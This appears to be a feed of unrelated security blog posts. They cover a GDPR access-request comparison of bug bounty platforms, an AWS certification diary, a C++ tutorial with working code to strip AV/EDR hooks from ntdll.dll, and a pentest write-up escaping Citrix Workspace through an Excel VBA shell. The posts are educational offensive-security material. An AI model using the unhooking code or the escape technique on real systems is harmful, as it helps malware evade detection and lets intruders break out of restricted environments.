Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a couple of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague since it could be anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & lastname, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After gathering for clarification, Intigriti told me that they’re only hosting in the Europe region in regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter did only cite their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, it seems that European bug bounty platforms like Intigriti and Zerocopter generally do better or rather seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck 🤣.

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a systemcall to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 1, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

handle hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what were are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the hookedSectionHeader->VirtualAddress address of the .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes )

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize)

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax and a number instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Escaping Citrix Workspace and Getting Shells

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to and RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel presented over the network onto our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

1
2
3
Sub X()
    Shell "CMD /K/ %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked the by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

